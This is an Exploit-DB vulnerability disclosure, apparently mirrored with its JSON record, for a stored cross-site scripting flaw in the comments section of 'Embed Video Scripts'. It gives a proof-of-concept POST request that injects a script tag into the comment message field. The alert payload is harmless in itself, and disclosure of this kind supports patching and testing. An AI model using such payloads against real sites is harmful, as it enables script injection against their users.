Search...

Embed Video Scripts - Persistent Cross-Site Scripting

2019-01-07T00:00:00

ID EDB-ID:46076
Type exploitdb
Reporter Exploit-DB
Modified 2019-01-07T00:00:00

Description

                                        
                                            # Exploit Title: Embed Video Scripts - Cross-site Script (stored)
# Google Dork: N/A
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# POC Video: https://youtu.be/2CFJLwkxpT8
# Vendor Homepage: https://codeawesome.in/embed/
# Software Link: https://codecanyon.net/item/embed-video-scripts/20831073
# Demo Website: https://codeawesome.in/embed/
# Version: N/A
# Tested on: WIN7_x68/Linux
# CVE : N/A

# Description:
A stored xss found in "Embed Video Scripts" comments section.

# POC Request:

:method: POST
:authority: server
:scheme: https
:path: /embed/comments
content-length: 145
accept: */*
origin: https://server
x-requested-with: XMLHttpRequest
user-agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
content-type: application/x-www-form-urlencoded; charset=UTF-8
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __cfduid=de9f1151befbf3ccdb372b7c1afb0a3bb1546252540
cookie: _tccl_visitor=208f2702-6472-41aa-b129-088a32f1eda6
cookie: _tccl_visit=208f2702-6472-41aa-b129-088a32f1eda6

message=&lt;script&gt;alert('Deyaa)&lt;/script&gt;&post_id=1&save=1&avatar=https%3A%2F%2Fserver%2Fembed%2Fassets%2Fimages%2Favatar%2F1.png

JSON Vulners Source

Initial Source

{"id": "EDB-ID:46076", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Embed Video Scripts - Persistent Cross-Site Scripting", "description": "", "published": "2019-01-07T00:00:00", "modified": "2019-01-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/46076", "reporter": "Exploit-DB", "references": [], "cvelist": [], "lastseen": "2019-01-07T16:59:04", "viewCount": 20, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2019-01-07T16:59:04", "rev": 2}, "dependencies": {"references": [], "modified": "2019-01-07T16:59:04", "rev": 2}, "vulnersScore": -0.4}, "sourceHref": "https://www.exploit-db.com/download/46076", "sourceData": "# Exploit Title: Embed Video Scripts - Cross-site Script (stored)\r\n# Google Dork: N/A\r\n# Date: 1 Jan 2019\r\n# Exploit Author: Deyaa Muhammad\r\n# Author EMail: contact [at] deyaa.me\r\n# Author Blog: http://deyaa.me\r\n# POC Video: https://youtu.be/2CFJLwkxpT8\r\n# Vendor Homepage: https://codeawesome.in/embed/\r\n# Software Link: https://codecanyon.net/item/embed-video-scripts/20831073\r\n# Demo Website: https://codeawesome.in/embed/\r\n# Version: N/A\r\n# Tested on: WIN7_x68/Linux\r\n# CVE : N/A\r\n\r\n# Description:\r\nA stored xss found in \"Embed Video Scripts\" comments section.\r\n\r\n# POC Request:\r\n\r\n:method: POST\r\n:authority: server\r\n:scheme: https\r\n:path: /embed/comments\r\ncontent-length: 145\r\naccept: */*\r\norigin: https://server\r\nx-requested-with: XMLHttpRequest\r\nuser-agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\r\ncontent-type: application/x-www-form-urlencoded; charset=UTF-8\r\naccept-encoding: gzip, deflate, br\r\naccept-language: en-US,en;q=0.9\r\ncookie: __cfduid=de9f1151befbf3ccdb372b7c1afb0a3bb1546252540\r\ncookie: _tccl_visitor=208f2702-6472-41aa-b129-088a32f1eda6\r\ncookie: _tccl_visit=208f2702-6472-41aa-b129-088a32f1eda6\r\n\r\nmessage=<script>alert('Deyaa)</script>&post_id=1&save=1&avatar=https%3A%2F%2Fserver%2Fembed%2Fassets%2Fimages%2Favatar%2F1.png", "osvdbidlist": []}